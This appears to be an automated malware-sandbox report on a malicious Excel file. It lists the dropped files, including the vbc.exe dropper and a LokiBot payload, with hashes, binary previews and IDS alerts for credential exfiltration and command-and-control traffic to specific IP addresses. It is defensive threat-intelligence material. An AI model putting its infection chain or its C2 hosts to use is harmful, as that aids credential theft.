                    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6DBF9C2.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):11303
                    Entropy (8bit):7.909402464702408
                    Encrypted:false
                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                    Malicious:false
                    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                    C:\Users\user\AppData\Local\Temp\2v0cucir72x

                    Download File
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):219608
                    Entropy (8bit):7.9897314726108535
                    Encrypted:false
                    SSDEEP:3072:HeVPHh1pYGP+TmX9fEv0W8Uc3pLmEavCycHI77blslGnM4Xryc7oxwdO8cRMJa3m:HeVfhf2uUSad7io3r2xGO8cRMYNrG+i
                    MD5:AC8E973D953305B03019CDB74006099C
                    SHA1:7976E0BE0FC69E238DAF16DB2BFF833340536C4E
                    SHA-256:2F62F941918151FCED3AD854B37DCDA1E40E91432D772781EBC2118E28987B41
                    SHA-512:3719354FA157A48C919AC13D1DA71DF1142D24448462355B83BD52FC3D3B8F8BF39E052FAFA3E9A961B3ED200FBBE8BD5C84716B9782392C75EFF34ADFFF38AB
                    Malicious:false
                    Preview:.:L...at.(.i.;T.7.......fRp.C..+.`..#......4.]./.sI.E.<.....2....HP.}.J..H.T.....4....Q%M.[.p}.).!x.Y.e.z.b..E......F.3.T.6.:.Y`...^.......{[...M.GM..h.4T.y...g.5.88M..78.g.-_........;._... ..9.Rz.....2...4L..dd.g.*%F...."n.]..L:.k.Wn.&............k...=....R[..di..@...^......%p....+x+..#...a..4!]....I.E.f.@...2.q.R.P./.-........A ...x.....;.c..5.5...s..~?^.....w.D...3.T.6..'d....GAy.N.9.}..F.. zk.!$....yG...<....d.....#..*1K5wD.'ZYU.d...o..........N...e.0...q}j=..U...<....B.Wn.......g...2+.{...=..p.at.(.i'.T..........Rp...+&`...x.....4.]./.sIiE.....^..2.jH.P.3.-...*..A....x.....@.c..(.5...s..~?^..E<.wd.....3.T.6..'d...vGAy.N.9.}..F.. zk.!$....yG...<....d.....#..*1K5wD.'ZYU.d...o.1o.......N...e.0...q}j=..U...<.L:.k.Wn.@.....g..P.+.k...=..p.at.(.i..T.......YfRp.C..+.`..#......4.]./.sI.E.<.....2.q...P./.-.......A....x.....;.c..5.5...s..~?^..E..wd.D...3.T.6..'d....GAy.N.9.}..F.. zk.!$....yG...<....d.....#..*1K5wD.'ZYU.d...o.1o.......N...e.0...q}j=..U...<.

                    C:\Users\user\AppData\Local\Temp\npotbzd

                    Download File
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4858
                    Entropy (8bit):6.17383796672968
                    Encrypted:false
                    SSDEEP:96:nt0EwCLn8tWfofJ1QSZe8ozFieNdFhpQbxxszw8PX/9LOz8AQK:t5n8kUHQSwFieNdFhGbH8PXIz8AQK
                    MD5:CB3FBCC52C7B5805ACF1F81D65488D89
                    SHA1:EAD5B088DA9F7466D9E10537A449A2F8C7505E85
                    SHA-256:05FB79420AADA2C2199CABAD68F4D6483127D2D803A5FD4E755008E78A977931
                    SHA-512:9CFB8EA161797F5131AC4780CBEE9FB8E56FADEEEBEC7D39BFC96416F1949D5E0247FA0F7B1E71C415BC9A08CCE1AAFF4003BBA9221CFB7F77A629794F8933CD
                    Malicious:false
                    Preview:..z.......U.......b..bf,5b..bf,.....:,.].........a..e.,.......,..1..a..e.,.......,%.)..a..e.,..&....,=.!..a..e.,.......,...de..+.}.....,a..,5.9.,e...F .,....,.......F#.e....,........,.......9..F.......y.>^........%...=X....X...5.....l..e...a...u........X..,}b..,.........:Yy.v.....yt>......,........a......b..bf,..,}...,a.u.,}....e.i....Y...,..,}..U..}...,........a..g...m.........i....2............}..t.............}......]b..bf,.:,.e....,..,..d...g.,.....,.U.,..,..,..9.i...l.W.,}.}.. ..Yt..t1.,..}..8..Yt..t1...}.....Y......2..(.....?....,..b.,....}......,..d.........z:,......,............Ub..bf,.:,.]....,..,..d...g.,.....,.U.,..,..,..9.....l.b......,}.}.. ..Yt..t..,a.}..8..Yt..t..,e.}.(8.Yt..t..,iF .}..#..Y|..|..,..}..8..Yt..t..}.....Y...g...7.....6....,..dM..}.,...M...J..M..i..e..a..}.*....,..d.........z:,......,.....i......q:,.e....,9.,..d...g.,.....,.U.,..,..,..9.....l.W.,}.}.. ..Yt9.t..,a.}..8..Yt9.t....}.....Y.9..t...Z.....y....,.....

                    C:\Users\user\AppData\Local\Temp\nsk9C03.tmp

                    Download File
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):354872
                    Entropy (8bit):7.605710868367885
                    Encrypted:false
                    SSDEEP:6144:oIeVfhf2uUSad7io3r2xGO8cRMYNrG+ehVpsA7bejlOmKCS:OhfZ07isKRZrleV7/+4mKCS
                    MD5:EE5B2397743F917D9F93DF1631178B23
                    SHA1:2F039C1927989531F121F34D6BF43DEB5703405E
                    SHA-256:6B105FD88793034BDD4A7B6A45E7EC131C36C20D8FAABC4B4AEA557C905C73D5
                    SHA-512:82DB48AE41CC1A0069CDDC2B9A5E28E9197521C59EA580500C577F39B5B3D0D7F4D8EEF186204FB33C7A12D7627F949BEE98890CC9F07E91182740B860E37D85
                    Malicious:false
                    Preview:V.......,...................C...................V...........................................................................................................................................................................................................................................J...............h...j...............................................................................................................................>...........!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\xmtxpy.exe

                    Download File
                    Process:C:\Users\Public\vbc.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):125440
                    Entropy (8bit):6.382878598936808
                    Encrypted:false
                    SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                    MD5:1EACD504E4461F9EE286715997D8A9EE
                    SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                    SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                    SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                    Malicious:true
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........oa...2...2...2..2...2..2...2..2...2..3...2...2...2...3...2...2...2...3...2Rich...2........PE..L......b.................x........................@..........................@.......o....@.......................................... .......................0......................................p...@............................................text....w.......x.................. ..`.rdata..*K.......L...|..............@..@.data... 0..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\~DF4C8DE484D23B018C.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\~DF4CA76D9E63A218F3.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:CDFV2 Encrypted
                    Category:dropped
                    Size (bytes):191736
                    Entropy (8bit):7.958679742635318
                    Encrypted:false
                    SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                    MD5:CF8B307CAA943326EE808BB3CB02DEEE
                    SHA1:705C25ADBDB7B805E47566540B3804EBA178E7DA
                    SHA-256:CBE84E2C523FD51DABB1365DF50415FFC51F8159C36798061742F08BA5D31B9B
                    SHA-512:CFC3AE790C2E17051A4B03214BAEFD44EB30E8601BF8AFD2D711CD197263854E96C19C2486A8838A1971607E09AD6728F6B9D8D982F6395B1FFC7D9C7EB599AA
                    Malicious:false
                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                    C:\Users\user\AppData\Local\Temp\~DF77B28016FA4D6C0D.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\~DFAC55491B3B868135.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):125440
                    Entropy (8bit):6.382878598936808
                    Encrypted:false
                    SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                    MD5:1EACD504E4461F9EE286715997D8A9EE
                    SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                    SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                    SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                    Malicious:false
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........oa...2...2...2..2...2..2...2..2...2..3...2...2...2...3...2...2...2...3...2Rich...2........PE..L......b.................x........................@..........................@.......o....@.......................................... .......................0......................................p...@............................................text....w.......x.................. ..`.rdata..*K.......L...|..............@..@.data... 0..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):1.0424600748477153
                    Encrypted:false
                    SSDEEP:3:/lbWwWl:sZ
                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                    Malicious:false
                    Preview:........................................user.

                    C:\Users\user\Desktop\~$_2201S_BUSAN_HOCHIMINH_.xlsx

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    C:\Users\Public\vbc.exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Category:dropped
                    Size (bytes):295124
                    Entropy (8bit):7.944502610174892
                    Encrypted:false
                    SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                    MD5:7DF1896047D9647D818080DD17563D92
                    SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                    SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                    SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.958679742635318
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:_2201S_BUSAN_HOCHIMINH_.xlsx
                    File size:191736
                    MD5:cf8b307caa943326ee808bb3cb02deee
                    SHA1:705c25adbdb7b805e47566540b3804eba178e7da
                    SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
                    SHA512:cfc3ae790c2e17051a4b03214baefd44eb30e8601bf8afd2d711cd197263854e96c19c2486a8838a1971607e09ad6728f6b9d8d982f6395b1ffc7d9c7eb599aa
                    SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                    File Content Preview:........................>......................................................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4b4bcb4

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    02/10/22-10:21:59.753805TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916680192.168.2.22172.67.197.66
                    02/10/22-10:21:59.753805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916680192.168.2.22172.67.197.66
                    02/10/22-10:21:59.753805TCP2025381ET TROJAN LokiBot Checkin4916680192.168.2.22172.67.197.66
                    02/10/22-10:21:59.753805TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916680192.168.2.22172.67.197.66
                    02/10/22-10:22:02.840347TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916780192.168.2.22172.67.197.66
                    02/10/22-10:22:02.840347TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916780192.168.2.22172.67.197.66
                    02/10/22-10:22:02.840347TCP2025381ET TROJAN LokiBot Checkin4916780192.168.2.22172.67.197.66
                    02/10/22-10:22:02.840347TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916780192.168.2.22172.67.197.66
                    02/10/22-10:22:03.831670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916880192.168.2.22172.67.197.66
                    02/10/22-10:22:03.831670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22172.67.197.66
                    02/10/22-10:22:03.831670TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22172.67.197.66
                    02/10/22-10:22:03.831670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916880192.168.2.22172.67.197.66
                    02/10/22-10:22:04.920208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916980192.168.2.22172.67.197.66
                    02/10/22-10:22:04.920208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.22172.67.197.66
                    02/10/22-10:22:04.920208TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.22172.67.197.66
                    02/10/22-10:22:04.920208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916980192.168.2.22172.67.197.66
                    02/10/22-10:22:05.958935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.22104.21.49.244
                    02/10/22-10:22:05.958935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.22104.21.49.244
                    02/10/22-10:22:05.958935TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.22104.21.49.244
                    02/10/22-10:22:05.958935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.22104.21.49.244
                    02/10/22-10:22:07.006112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.22172.67.197.66
                    02/10/22-10:22:07.006112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.22172.67.197.66
                    02/10/22-10:22:07.006112TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.22172.67.197.66
                    02/10/22-10:22:07.006112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.22172.67.197.66
                    02/10/22-10:22:08.131839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.22104.21.49.244
                    02/10/22-10:22:08.131839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.22104.21.49.244
                    02/10/22-10:22:08.131839TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.22104.21.49.244
                    02/10/22-10:22:08.131839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.22104.21.49.244
                    02/10/22-10:22:09.274963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.22172.67.197.66
                    02/10/22-10:22:09.274963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.22172.67.197.66
                    02/10/22-10:22:09.274963TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.22172.67.197.66
                    02/10/22-10:22:09.274963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.22172.67.197.66
                    02/10/22-10:22:10.415912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.22104.21.49.244
                    02/10/22-10:22:10.415912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.22104.21.49.244
                    02/10/22-10:22:10.415912TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.22104.21.49.244
                    02/10/22-10:22:10.415912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.22104.21.49.244
                    02/10/22-10:22:11.483873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.22104.21.49.244
                    02/10/22-10:22:11.483873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22104.21.49.244
                    02/10/22-10:22:11.483873TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22104.21.49.244
                    02/10/22-10:22:11.483873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22104.21.49.244
                    02/10/22-10:22:12.553926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22172.67.197.66
                    02/10/22-10:22:12.553926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22172.67.197.66
                    02/10/22-10:22:12.553926TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22172.67.197.66
                    02/10/22-10:22:12.553926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22172.67.197.66
                    02/10/22-10:22:13.627098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22104.21.49.244
                    02/10/22-10:22:13.627098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22104.21.49.244
                    02/10/22-10:22:13.627098TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22104.21.49.244
                    02/10/22-10:22:13.627098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22104.21.49.244
                    02/10/22-10:22:14.784465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22172.67.197.66
                    02/10/22-10:22:14.784465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22172.67.197.66
                    02/10/22-10:22:14.784465TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22172.67.197.66
                    02/10/22-10:22:14.784465TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22172.67.197.66
                    02/10/22-10:22:15.879811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22172.67.197.66
                    02/10/22-10:22:15.879811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22172.67.197.66
                    02/10/22-10:22:15.879811TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22172.67.197.66
                    02/10/22-10:22:15.879811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22172.67.197.66
                    02/10/22-10:22:17.222000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22172.67.197.66
                    02/10/22-10:22:17.222000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22172.67.197.66
                    02/10/22-10:22:17.222000TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22172.67.197.66
                    02/10/22-10:22:17.222000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22172.67.197.66
                    02/10/22-10:22:18.584775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22172.67.197.66
                    02/10/22-10:22:18.584775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22172.67.197.66
                    02/10/22-10:22:18.584775TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22172.67.197.66
                    02/10/22-10:22:18.584775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22172.67.197.66
                    02/10/22-10:22:20.304833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22172.67.197.66
                    02/10/22-10:22:20.304833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22172.67.197.66
                    02/10/22-10:22:20.304833TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22172.67.197.66
                    02/10/22-10:22:20.304833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22172.67.197.66
                    02/10/22-10:22:21.371169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22172.67.197.66
                    02/10/22-10:22:21.371169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22172.67.197.66
                    02/10/22-10:22:21.371169TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22172.67.197.66
                    02/10/22-10:22:21.371169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22172.67.197.66
                    02/10/22-10:22:22.490195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22172.67.197.66
                    02/10/22-10:22:22.490195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22172.67.197.66
                    02/10/22-10:22:22.490195TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22172.67.197.66
                    02/10/22-10:22:22.490195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22172.67.197.66
                    02/10/22-10:22:23.504559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22104.21.49.244
